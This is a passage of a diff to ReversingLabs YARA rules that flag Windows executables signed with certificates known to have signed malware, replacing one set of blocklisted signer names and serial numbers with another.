"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "df8ca35a07ec6815d1efb68fa6fbf8f80c57032ecb99d0b038da0604ceffe8cf" score = 75 quality = 90 tags = "INFO, FILE" @@ -12262,22 +32053,22 @@ rule REVERSINGLABS_Cert_Blocklist_15Da61D7E1A631803431561674Fb9B90 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "JAY DANCE STUDIO d.o.o." and pe.signatures[i].serial=="15:da:61:d7:e1:a6:31:80:34:31:56:16:74:fb:9b:90" and 1610668800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FSPro Labs" and pe.signatures[i].serial=="78:4f:22:6b:45:c3:bd:8e:40:89:24:3d:74:7d:1f:59" and 1242777599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7Ab21306B11Ff280A93Fc445876988Ab : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_11690F05604445Fae0De539Eeeeec584 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "656bb2a6-bb41-5190-af10-280351e64c66" + id = "e6513bd1-2524-5baa-8484-b7e0f2f0c02a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8584-L8600" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0cda954aa807336a6737716d0fa43d696376c240ab7be9d8477baf8800604bf1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2596-L2612" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b66257f562f698559910eb9576f8fdf0ce3a750cc0a96a27e2ec1a18872ad13f" score = 75 quality = 90 tags = "INFO, FILE" @@ -12287,22 +32078,22 @@ rule REVERSINGLABS_Cert_Blocklist_7Ab21306B11Ff280A93Fc445876988Ab : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ABC BIOS d.o.o." and pe.signatures[i].serial=="7a:b2:13:06:b1:1f:f2:80:a9:3f:c4:45:87:69:88:ab" and 1611014400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Tera information Technology co.Ltd" and pe.signatures[i].serial=="11:69:0f:05:60:44:45:fa:e0:de:53:9e:ee:ee:c5:84" and 1294703999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_634E16E38F12E9A71Aca08E4C6B2Dbb9 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Aa146Bff4B832Bdbfe30B84580356763 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4aa7bea7-06fb-5d90-bac4-c8ca1ca5c02f" + id = "90fab567-f39f-5d0b-b0d9-a93693a05a01" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8602-L8618" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "08950f276e5cf3fe4b5f7421ba671dfd72585aac3bbed7868fdb0e5aa90ec10e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2614-L2632" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "37abe7a4fd773fd34f5d7dbe725ba4edcfb8ebb501dc41f386b8b0629161051f" score = 75 quality = 90 tags = "INFO, FILE" @@ -12312,22 +32103,22 @@ rule REVERSINGLABS_Cert_Blocklist_634E16E38F12E9A71Aca08E4C6B2Dbb9 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AUTO RESPONSE LTD CYF" and pe.signatures[i].serial=="63:4e:16:e3:8f:12:e9:a7:1a:ca:08:e4:c6:b2:db:b9" and 1616112000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yancheng Peoples Information Technology Service Co., Ltd" and (pe.signatures[i].serial=="00:aa:14:6b:ff:4b:83:2b:db:fe:30:b8:45:80:35:67:63" or pe.signatures[i].serial=="aa:14:6b:ff:4b:83:2b:db:fe:30:b8:45:80:35:67:63") and 1295481599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_289051A83F350A2C600187C99B6C0A73 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_E86F46B60142092Aae81B8F6Fa3D9C7C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "55497d57-7d4f-50e1-85a6-e60786084e3f" + id = "fde17cc1-a968-5134-b12b-d65cb34c086f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8620-L8636" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cd5d6f95f0cfdbf8d37ea78d061ce00512b6cb7c899152b1640673494d539dd1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2634-L2652" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6de16a44bc84fbf8f1d3d82526e1d7f8fd4ae3da6deaa471c77d2c8df47a14b0" score = 75 quality = 90 tags = "INFO, FILE" @@ -12337,22 +32128,22 @@ rule REVERSINGLABS_Cert_Blocklist_289051A83F350A2C600187C99B6C0A73 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HALL HAULAGE LTD LTD" and pe.signatures[i].serial=="28:90:51:a8:3f:35:0a:2c:60:01:87:c9:9b:6c:0a:73" and 1616716800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Syncode Sistemas e Tecnologia Ltda" and (pe.signatures[i].serial=="00:e8:6f:46:b6:01:42:09:2a:ae:81:b8:f6:fa:3d:9c:7c" or pe.signatures[i].serial=="e8:6f:46:b6:01:42:09:2a:ae:81:b8:f6:fa:3d:9c:7c") and 1373932799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_818631110B5D14331Dac7E6Ad998B902 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1A0Fd2A4Ef4C2A36Ab9C5E8F792A35E2 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6a8f3abd-199c-5e2f-a60e-46e869831445" + id = "7148a21a-97d6-59a2-a1cf-442c271bc0b5" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8638-L8656" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5e0de3848adf933632c2eb8cf5ead61d6470237386ba8b48d57a278d99dba324" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2654-L2670" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8e768415998a6a92961986cb0a9d310514d928be93b3e5a9aaa9ec71bf5886ad" score = 75 quality = 90 tags = "INFO, FILE" @@ -12362,22 +32153,22 @@ rule REVERSINGLABS_Cert_Blocklist_818631110B5D14331Dac7E6Ad998B902 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "2 TOY GUYS LLC" and (pe.signatures[i].serial=="00:81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" or pe.signatures[i].serial=="81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02") and 1571616000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE9\\x87\\x91\\xE5\\x88\\xA9\\xE5\\xAE\\x8F\\xE6\\x98\\x8C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="1a:0f:d2:a4:ef:4c:2a:36:ab:9c:5e:8f:79:2a:35:e2" and 1389311999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_277Cd16De5D61B9398B645Afe41C09C7 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_53Bb753B79A99E61A6E822Ac52460C70 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d863faac-7b6e-5e1d-960f-8379347c6838" + id = "6339d548-775b-52b9-84c5-a79de23a16b2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8658-L8674" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "696467d699dec060b205f36f53dbe157b241823757d72798b35235d6530fd193" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2672-L2688" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "24ff4f46fa6e85c25e130459f9b8d6907cf6cd51098e0cf45ec11d54d7de509b" score = 75 quality = 90 tags = "INFO, FILE" @@ -12387,22 +32178,22 @@ rule REVERSINGLABS_Cert_Blocklist_277Cd16De5D61B9398B645Afe41C09C7 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "THE SIGN COMPANY LIMITED" and pe.signatures[i].serial=="27:7c:d1:6d:e5:d6:1b:93:98:b6:45:af:e4:1c:09:c7" and 1619049600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xEB\\x8D\\xB0\\xEC\\x8A\\xA4\\xED\\x81\\xAC\\xED\\x83\\x91\\xEC\\x95\\x84\\xEC\\x9D\\xB4\\xEC\\xBD\\x98" and pe.signatures[i].serial=="53:bb:75:3b:79:a9:9e:61:a6:e8:22:ac:52:46:0c:70" and 1400543999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_D0Eda76C13D30C97015708790Bb94214 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_83F68Fc6834Bf8Bd2C801A2D1F1Acc76 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "aa323bac-a9f5-560f-b44a-3cf2b26351bb" + id = "763d4faf-19af-5349-a643-4773055df47a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8676-L8694" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2112ebfb7c9ebbbccb20cefcd23bb49142da770feb16ee8eef5eb27646226785" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2690-L2708" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "35552242f9f0a56b45e30e6f376877446f33e24690ff5d7b03dc776fab178afd" score = 75 quality = 90 tags = "INFO, FILE" @@ -12412,22 +32203,22 @@ rule REVERSINGLABS_Cert_Blocklist_D0Eda76C13D30C97015708790Bb94214 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LAEN ApS" and (pe.signatures[i].serial=="00:d0:ed:a7:6c:13:d3:0c:97:01:57:08:79:0b:b9:42:14" or pe.signatures[i].serial=="d0:ed:a7:6c:13:d3:0c:97:01:57:08:79:0b:b9:42:14") and 1619136000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Helpful Technologies, Inc" and (pe.signatures[i].serial=="00:83:f6:8f:c6:83:4b:f8:bd:2c:80:1a:2d:1f:1a:cc:76" or pe.signatures[i].serial=="83:f6:8f:c6:83:4b:f8:bd:2c:80:1a:2d:1f:1a:cc:76") and 1407715199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6333Ed618F88A05B4D82Ad7Bf66Cb0Fa : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_F385E765Acfb95605C9B35Ca4C32F80E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c4d3603e-57e2-57df-a055-c43d449242c7" + id = "865f8daf-35c4-5437-9c97-9b9fc48d7d70" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8696-L8712" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b088ac4b74a8cf3dddb67c8de2b7c3c5f537287a0454c0030c0eb4069c465c7d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2710-L2728" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c73c8f1913d3423a52f5e77751813460ae9200eb3cb1cc6e2ec30f37f0da8152" score = 75 quality = 90 tags = "INFO, FILE" @@ -12437,22 +32228,22 @@ rule REVERSINGLABS_Cert_Blocklist_6333Ed618F88A05B4D82Ad7Bf66Cb0Fa : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RHM LIMITED" and pe.signatures[i].serial=="63:33:ed:61:8f:88:a0:5b:4d:82:ad:7b:f6:6c:b0:fa" and 1616457600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CWI SOFTWARE LTDA" and (pe.signatures[i].serial=="00:f3:85:e7:65:ac:fb:95:60:5c:9b:35:ca:4c:32:f8:0e" or pe.signatures[i].serial=="f3:85:e7:65:ac:fb:95:60:5c:9b:35:ca:4c:32:f8:0e") and 1382313599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3B777165B125Bccc181D0Bac3F5B55B3 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_F62C9C4Efc81Caf0D5A2608009D48018 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f065e99f-9cce-55cb-a592-60b89c26028a" + id = "176434ae-7162-5b35-91f7-888536250884" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8714-L8730" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "80aff3d6f45f5847d5d39b170b9d0e70168d02569ca6d86a2c39150399d290fc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2730-L2748" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "08fcff795297c0608b1a1d71465279cbf76d4dff06de2a2262a58debbb2f9e0d" score = 75 quality = 90 tags = "INFO, FILE" @@ -12462,22 +32253,22 @@ rule REVERSINGLABS_Cert_Blocklist_3B777165B125Bccc181D0Bac3F5B55B3 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "STAND ALONE MUSIC LTD" and pe.signatures[i].serial=="3b:77:71:65:b1:25:bc:cc:18:1d:0b:ac:3f:5b:55:b3" and 1607299200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\x94\\x90\\xE5\\xB1\\xB1\\xE4\\xB8\\x87\\xE4\\xB8\\x9C\\xE6\\xB6\\xA6\\xE6\\x92\\xAD\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and (pe.signatures[i].serial=="00:f6:2c:9c:4e:fc:81:ca:f0:d5:a2:60:80:09:d4:80:18" or pe.signatures[i].serial=="f6:2c:9c:4e:fc:81:ca:f0:d5:a2:60:80:09:d4:80:18") and 1292889599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5B37Ac3479283B6F9D75Ddf0F8742D06 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Cc8D902Da36587C9B2113Cd76C3C3F8D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "cc124d3f-2446-57a2-a206-0a5e569fc703" + id = "f9e542aa-eaa5-50a5-95dc-fb55f8575c89" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8732-L8748" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b7abd389ac31cd970e6611c7c303714fdd658f45d4857ad524f5e8368edbb875" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2750-L2768" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "25e524d23ccc1c06f602a086369ffd44b8c97b76c29f068764081339556b3465" score = 75 quality = 90 tags = "INFO, FILE" @@ -12487,22 +32278,22 @@ rule REVERSINGLABS_Cert_Blocklist_5B37Ac3479283B6F9D75Ddf0F8742D06 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ART BOOK PHOTO s.r.o." and pe.signatures[i].serial=="5b:37:ac:34:79:28:3b:6f:9d:75:dd:f0:f8:74:2d:06" and 1619740800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE9\\x87\\x91\\xE4\\xBF\\x8A\\xE5\\x9D\\xA4\\xE8\\xAE\\xA1\\xE7\\xAE\\x97\\xE6\\x9C\\xBA\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x8D\\xE5\\x8A\\xA1\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and (pe.signatures[i].serial=="00:cc:8d:90:2d:a3:65:87:c9:b2:11:3c:d7:6c:3c:3f:8d" or pe.signatures[i].serial=="cc:8d:90:2d:a3:65:87:c9:b2:11:3c:d7:6c:3c:3f:8d") and 1292544000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3112C69D460C781Fd649C71E61Bfec82 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_328Bdcc0F679C4649147Fbb3Eb0E9Bc6 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f4d2f240-49a7-51f3-8db1-1c569aa63177" + id = "8e2c2204-8905-5e05-9ec8-e1577ae4c2cb" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8750-L8766" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ed31b0a24d18a451163867f0f49df12af3ca0768f250ac8ce66d41405393130d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2770-L2786" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6d9e1f25ca252ca9dda7714c52a2e57fd3b5dca08cd2a45c9dec18a31d3bb342" score = 75 quality = 90 tags = "INFO, FILE" @@ -12512,22 +32303,22 @@ rule REVERSINGLABS_Cert_Blocklist_3112C69D460C781Fd649C71E61Bfec82 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "KREATURHANDLER BJARNE ANDERSEN ApS" and pe.signatures[i].serial=="31:12:c6:9d:46:0c:78:1f:d6:49:c7:1e:61:bf:ec:82" and 1614902400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Nooly Systems LTD" and pe.signatures[i].serial=="32:8b:dc:c0:f6:79:c4:64:91:47:fb:b3:eb:0e:9b:c6" and 1204847999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0A5B4F67Ad8B22Afc2Debe6Ce5F8F679 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5F78149Eb4F75Eb17404A8143Aaeaed7 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7dd5ba42-2d04-52d7-b15a-2bdba2e742fb" + id = "4c9d3bba-4e7f-5bf5-ab90-f2b900ec0b2a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8768-L8784" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "938efb7ee19970484aded5cd46b2ff730f8882706bec3f062bdebde3cc9a4799" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2788-L2804" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0c7c9e8d2a9304e0407b8a1a29977312a9ba766a4052c6b874855fa187c85585" score = 75 quality = 90 tags = "INFO, FILE" @@ -12537,22 +32328,22 @@ rule REVERSINGLABS_Cert_Blocklist_0A5B4F67Ad8B22Afc2Debe6Ce5F8F679 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Farad LLC" and pe.signatures[i].serial=="0a:5b:4f:67:ad:8b:22:af:c2:de:be:6c:e5:f8:f6:79" and 1607472000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE5\\x9F\\x9F\\xE8\\x81\\x94\\xE8\\xBD\\xAF\\xE4\\xBB\\xB6\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="5f:78:14:9e:b4:f7:5e:b1:74:04:a8:14:3a:ae:ae:d7" and 1303116124<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Df45B36C9D0Bd248C3F9494E7Ca822 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_629D120Dd84F9C1688D4Da40366Fab7A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d7d0d1c4-b341-5651-8179-4035f537ba98" + id = "7e6249ba-3a4f-5096-be32-779e73c88221" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8786-L8804" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9c03522376b0d807cd36a0641e474d770bc3b4f8221f26d232878d2d320d072b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2806-L2822" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "187f6ef0de869500526d1b0d5c6f6762b0a939e06781e633a602834687c64023" score = 75 quality = 90 tags = "INFO, FILE" @@ -12562,22 +32353,22 @@ rule REVERSINGLABS_Cert_Blocklist_Df45B36C9D0Bd248C3F9494E7Ca822 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MPO STORITVE d.o.o." and (pe.signatures[i].serial=="00:df:45:b3:6c:9d:0b:d2:48:c3:f9:49:4e:7c:a8:22" or pe.signatures[i].serial=="df:45:b3:6c:9d:0b:d2:48:c3:f9:49:4e:7c:a8:22") and 1619740800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Delta Controls" and pe.signatures[i].serial=="62:9d:12:0d:d8:4f:9c:16:88:d4:da:40:36:6f:ab:7a" and 1306799999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1Ae3C4Eccecda2127D43Be390A850Dda : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_039E5D0E3297F574Db99E1D9503853D9 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a9d8906b-64f6-5c5d-80e0-ab916e83b613" + id = "969ffa17-de06-58d5-a74e-c115b49a9a6c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8806-L8822" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8a2ff4f7a5ac996127778b1670e79291bddcb5dee6e7da2b540fd254537ee27e" + source_url = 